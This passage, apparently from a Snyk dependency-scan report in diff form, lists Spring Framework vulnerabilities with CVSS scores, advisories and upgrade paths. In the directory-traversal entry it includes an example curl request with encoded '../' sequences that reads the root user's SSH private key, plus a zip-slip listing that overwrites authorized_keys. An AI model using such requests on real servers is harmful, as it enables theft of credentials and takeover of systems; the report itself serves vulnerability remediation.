"socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.8.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "credit": [ - "Sean Pesce" - ], - "semver": { - "vulnerable": [ - "[,5.3.32)", - "[6.0.0,6.0.17)", - "[6.1.0,6.1.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.32", - "6.0.17", - "6.1.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2024-22243", - "title": "Spring Advisory" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-02T15:25:03.264548Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22243" - ], - "CWE": [ - "CWE-601", - "CWE-918" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-02-22T09:39:25.202849Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-02-21T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-02-22T15:48:30.525565Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-02T15:25:03.264548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "credit": [ - "threedr3am" - ], - "semver": { - "vulnerable": [ - "[,5.3.33)", - "[6.0.0, 6.0.18)", - "[6.1.0, 6.1.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.33", - "6.0.18", - "6.1.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2024-22259", - "title": "Spring Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-17T13:32:42.716493Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-02T15:25:03.250566Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-17T13:32:42.716493Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", - "epssDetails": { - "percentile": "0.26310", - "probability": "0.00061", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22259" - ], - "CWE": [ - "CWE-601" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-03-15T10:11:04.950943Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-03-14T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-03-15T10:42:12.997061Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-02T15:25:03.250566Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.33" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "credit": [ - "L0ne1y" - ], - "semver": { - "vulnerable": [ - "[,5.3.34)", - "[6.0.0, 6.0.19)", - "[6.1.0, 6.1.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.34", - "6.0.19", - "6.1.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://spring.io/security/cve-2024-22262", - "title": "Spring Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-04-16T13:32:25.163950Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.4, - "cvssVersion": "3.1", - "modificationTime": "2024-04-12T08:32:41.960388Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-04-16T13:32:25.163950Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22262" - ], - "CWE": [ - "CWE-601" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-04-12T08:32:41.735891Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-04-11T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-04-12T08:32:41.913608Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-16T13:32:25.163950Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.18.RELEASE", - "org.springframework:spring-core@5.2.18.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.19.RELEASE", - "org.springframework:spring-core@5.2.19.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.9.RELEASE", - "org.springframework:spring-core@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- 